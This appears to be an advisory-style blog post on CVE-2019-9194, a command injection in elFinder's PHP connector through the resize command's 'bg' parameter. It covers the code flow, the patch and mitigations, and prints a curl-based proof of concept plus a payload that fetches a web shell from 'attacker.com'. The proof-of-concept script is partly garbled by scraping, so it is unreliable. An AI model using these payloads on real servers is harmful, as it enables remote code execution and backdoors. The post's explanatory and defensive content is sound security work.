Listen to this Post
How the CVE Works (Approx. 20 lines):
- Vulnerable Component: The PHP connector of elFinder versions prior to 2.1.48.
- Trigger Command: The `resize` command, which includes image rotation functionality.
- Vulnerable Parameter: The `bg` (background color) parameter, which is accepted from user input.
- Backend Dependency: The vulnerability is exploitable when the application uses the ImageMagick CLI backend for image processing.
- Lack of Sanitization: The user-supplied `bg` value is incorporated directly into shell command strings without proper escaping or validation.
- Shell Command Construction: The unsanitized value is passed to functions like
proExec, which executes system commands. - Command Injection: An attacker can inject shell metacharacters (e.g.,
;,|,&,$()) into the `bg` parameter. - Arbitrary Command Execution: When the `resize` command is processed, the injected metacharacters break out of the intended command structure, allowing the attacker to execute arbitrary OS commands.
- Privilege Context: The injected commands run with the privileges of the web server process (e.g.,
www-data). - Attack Vector: The attacker sends a crafted HTTP request to the elFinder PHP connector (e.g.,
connector.minimal.php). - Example Request Parameters: The malicious request includes parameters like
cmd=resize,target=<file_hash>, andbg=red; id > /tmp/out. - Code Flow: The request reaches the `imgRotate` method in
elFinderVolumeDriver.class.php, where the unsanitized `bg` value is concatenated into the command array. - Command Execution: The constructed command is then passed to the shell via
proExec, leading to execution of the injected commands. - Impact on System: The attacker can read, write, delete files, or install backdoors, effectively compromising the server.
- Unauthenticated Access: The PHP connector is accessible without authentication in many configurations, making the vulnerability easy to exploit.
- Patch Analysis: The fix in version 2.1.48 involves strict input validation (allowlist) and proper escaping of the `bg` parameter before shell command construction.
- Proof of Concept: Public exploits (e.g., Metasploit module
exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection) demonstrate the vulnerability. - CVE Details: CVE-2019-9194 was disclosed on February 26, 2019, with a CVSS score of 9.8 (Critical).
- Affected Versions: All elFinder versions before 2.1.48 are vulnerable.
- Mitigation: Upgrade to elFinder version 2.1.48 or later, or disable the `resize` command and avoid using the ImageMagick CLI backend.
DailyCVE Form:
Platform: elFinder PHP connector
Version: before 2.1.48
Vulnerability: Command Injection (RCE)
Severity: High (CVSS 9.8)
Date: 2019-02-26
Prediction: Patch by 2019-03-01
What Undercode Say:
Analytics: The vulnerability is triggered by unsanitized input in the `resize` command’s `bg` parameter, leading to arbitrary command execution. Attackers can easily exploit this without authentication.
Bash Commands and Codes (Example Exploit Snippet):
!/bin/bash Simple PoC for CVE-2019-9194 Upload a malicious file and trigger the resize command TARGET="http://target.com/elfinder/php/connector.minimal.php" HASH=$(curl -s -F "upload[][email protected]" "$TARGET?cmd=upload" | jq -r '.added[bash].hash') curl -s "$TARGET?cmd=resize&target=$HASH&bg=red; id > /tmp/out"
How Exploit:
An attacker uploads an image with a crafted filename (or uses the `bg` parameter directly). The unsanitized value is concatenated into a shell command, allowing injection of arbitrary commands. For example, `bg=red; wget http://attacker.com/shell -O /tmp/shell.php` would download a web shell.
Protection from this CVE:
1. Upgrade to elFinder version 2.1.48 or later.
2. Disable the `resize` command if not required.
- Avoid using the ImageMagick CLI backend; use the GD library instead.
- Restrict access to the PHP connector to trusted IP addresses.
- Use a Web Application Firewall (WAF) to filter malicious input.
Impact:
- Confidentiality: An attacker can read sensitive files (e.g., configuration files, database credentials).
- Integrity: An attacker can modify or delete files, deface websites, or upload malicious content.
- Availability: An attacker can disrupt services by deleting critical files or overloading the server.
- Privilege Escalation: The attacker can gain a foothold on the server and potentially escalate privileges to root.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

